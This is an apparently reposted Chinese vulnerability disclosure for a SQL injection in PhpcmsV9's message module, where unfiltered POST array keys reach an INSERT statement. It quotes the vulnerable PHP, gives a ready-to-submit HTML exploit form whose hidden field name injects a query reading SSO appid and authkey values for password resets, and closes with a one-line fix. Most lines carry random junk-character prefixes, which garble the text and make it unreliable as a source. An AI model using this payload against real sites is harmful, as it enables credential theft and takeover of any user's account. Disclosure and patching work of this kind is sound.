PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：
3 {/ ]+ W- l4 X0 A9 N' ?2 i- x
第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
& m, b' F4 F9 Z, M* n
3 Q( z8 j  }8 {5 A明天再更新下一个漏洞。
& O" H- e/ w; Z0 w/ j详细说明：
$ G% s& n. [" c6 l/ A+ j3 e在/phpcms9/phpcms/modules/message/index.php中有代码如下：

' M; o/ z2 t' F. e7 F- n+ K$messageid = $this->message_db->insert($_POST['info'],true);


7 C. k/ q- U6 c% g3 B/ e" oinsert方法是key value的，代码如下：
) m/ V8 J6 B+ H4 {
- ^' H, S. D" B* apublic function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
1 h! Y; I, D: {4 A0 O                        return false;
: G- w! {0 `" J1 I# `: ?                }
               
                $fielddata = array_keys($data);
                $valuedata = array_values($data);
, H9 ^" v! A$ j7 s8 C                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
/ E! {1 b! d; O% t- b               
5 V3 J0 q  E2 i8 \                $field = implode (',', $fielddata);
; `7 F' w: t6 J5 B. _0 U9 @                $value = implode (',', $valuedata);

                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
* F# V1 T+ D4 s' f. s7 z# q3 ]                $return = $this->execute($sql);
                return $return_insert_id ? $this->insert_id() : $return;
        }
  w( R7 @6 L: P: m
( z& e  U& W5 g
) a+ }, o4 t7 x嗯，很遗憾的是
0 L0 t' P) E: h4 L  H/ t0 ]
array_walk($fielddata, array($this, 'add_special_char'));

- g/ N8 m; D- b3 L8 _& r
中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。
+ K; e) G) n1 u! h8 S3 `  I0 o  l
漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
5 y! Y: K/ O4 R. M& X! L0 N! Q& ]

9 g8 D8 [) f0 s表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
) t8 d7 T$ ], ?/ N8 A( V1 p* n2 |<table width="100%" cellspacing="0" class="table_form">
  f$ _$ n' H. C<tr>
<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
; x7 x( ?$ f: Z$ p</tr>
/ i. x( g4 c* a2 |! @  P- v5 j<tr>
# o4 H7 [9 O  b+ i! n; Z+ ]! c( e<th>内 容：</th>
7 G7 f) I# ~8 ]) U<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
( w2 \0 H8 ?4 M, j: t</tr>
<input type="hidden" name="info[replyid]" value="2" />
; P; j; L7 z; j8 E, N3 z<input type="hidden" name="info[send_to_id]" value="cc" />
<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
' f) F( b- F& s; T<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
<!-- 漏洞的利用重点在这里结束 -->
' i) C1 o5 O, E! v/ \+ ^2 @0 m* ^<tr>
7 f1 H  V" O. [2 |: L0 y5 z5 _6 y* M<th>验证码：</th>
0 D# E2 L3 ^  u, e/ a4 o' F; O: H<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
7 o4 G" w; \1 l: M; h0 O</tr>
<tr>
<td></td>
8 q" G- I8 t' O+ @) i<td colspan="2"><label>
; c% R% k2 i% ?4 d<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
) c# Y% L7 y. Q5 C4 d6 Q</label></td>
6 L, O& F& m5 F, y8 _- X</tr>
, q4 Z, T1 x9 v0 u. P. ^' Y1 P</table>
6 \8 m6 N2 S4 N+ @</form>
在add_special_char函数内对key做过滤就可以了。

  H" A/ m. M$ R( l